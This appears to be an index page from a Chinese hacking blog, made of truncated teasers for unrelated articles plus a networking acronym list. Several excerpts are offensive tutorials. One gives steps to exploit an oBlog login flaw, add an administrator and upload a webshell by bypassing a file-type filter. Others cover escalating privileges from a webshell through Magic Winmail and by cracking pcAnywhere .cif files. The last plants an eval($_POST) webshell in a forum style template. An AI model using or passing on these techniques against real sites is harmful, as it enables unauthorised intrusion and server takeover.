原文作者:K. K. Mookhey,Nilesh Burghate
文章翻译:FPX[B.C.T]
1. 介绍
在最后 两年中,安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有遵循 安全代码进行开发,攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref1]和CSS[ref2]攻击。SQL注入是指:通过互联网的输入区域,插入SQL meta-characters(特殊字符 代表一些数据)和指令,操纵执行后端的SQL查询的技术。这些攻击主要针对其他组织的WEB服务器。CSS攻击通过在URL里插入script标签,然后 诱导信任它们的用户点击它们,确保恶意Javascript代码在受害人的机器上运行。这些攻击利用了用户和服务器之间的信任关系,事实上服务器没有对输入、输出进行检测,从而未拒绝javascript代码。
阅读全文 »
Tags: SQL Injection,
SQL注入
文章作者:千寂孤城
信息来源:邪恶八进制信息安全团队
一、方法
1、先进后台。利用CheckUserLogined漏洞直接加个后台管理员。关于这个CheckUserLogined漏洞我在《Blog的噩梦》(http://www.eviloctal.com/forum/htm_data/10/0508/13721.html )中有详细的说明,大概就是说可以通过Cookies欺骗搞SQL注入。
2、在后台的“网站信息配置”处有个“普通会员上传文件类型”,给它加一个aaaspspsp类型。
3、用个普通帐号登陆,来到上传文件的页面http://blog.***.com/upload.asp ,看到了吗?可上传文件多了个“aaspsp”类型。好,把你的马x.asp改名为x.aaspsp,然后传上去。
4、到你自己的blog后台去看一看,是不是成功上传了x.asp了?:)
二、原理
阅读全文 »
文章来源:lis0
环境:所有使用了Magic Winmail软件的服务器,前提你已经得到了一个webshell :)
Magic Winmail是一款很不错的mail server 软件,深受不少网站的青睐。主要是一些中小的网站。但是在笔者最近的一次渗透中发现,装有改软件的服务器,如果一旦被入侵者得到webshell就可以通过这个软件来提升权限,非常危险。
装有Magic Winmail的服务器会在系统上开启8080端口,对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解析。图1 阅读全文 »
文章作者:千寂孤城
信息来源:邪恶八进制信息安全团队
注:本文已发表在2005年8月的《黑客X档案》杂志上
现在的博客可谓是如日中天啊,还自称是“互联网的第四块里程碑”。期末考试刚刚结束,我就下了套oBlog 2.52来研究,我读啊读、找啊找,终于让我找到个大漏洞。
问题出在inc/function.asp的CheckUserLogined()函数中,大家看代码:
阅读全文 »
LAN 局域网
WAN 广域网
UTP 非屏蔽的双绞线
STP 屏蔽的双绞线
ATM 异步传输模式
FDDI 光纤分布式数据接口
CSMA/CD 载波侦听多路访问方法
MSAU 多站访问单元
ATM 异部传输模式
PVC 永久虚拟回路
Hub 集线器
PSTN 公共交换电话网
ISDN 综合业务数字网
ADSL 非对称数字用户线路
Bridge 网桥
Switch 交换机
Router 路由器
Gateway 网关
VPN 虚拟专用网络
PRI 主数率接口
BRI 基本数率接口
MAC 媒体访问控制
OSI 开放式系统互连
TCP/IP 传输控制协议/网际协议
IPX/SPX 网际数据包交换/系列数据包交换
阅读全文 »
来源:lake2的专栏
ASP.NET下有自己的执行CMD命令的方式,这里用WScript.Shell似有画蛇添足之嫌,但是我们也不能排除真的有机器禁用了.NET的相关类,未雨绸缪嘛。当然也不仅仅局限于WScript.Shell,只要是ASP中能用的组件,统统都可以用于ASP.NET中,而且还更方便!
ASP.NET提供了两种方法让我们使用COM组件:1、Server对象的CreatObject方法;2、将COM组件转化为.NET组件。
·Server对象的CreatObject方法
这个方法比较简单,直接使用就是。当然前提是服务器上已经注册了该组件,而WScript.Shell是系统自带的,我们不用担心。只是在编写代码时注意ASP.NET与ASP语法上的细微差别就可以了。直接给出代码如下:
阅读全文 »
来源:承诺's Blog
话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了
********** 阅读全文 »
作者:浅蓝的辐射鱼 来源:邪恶八进制信息安全团队技术论坛
*************************************/
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
阅读全文 »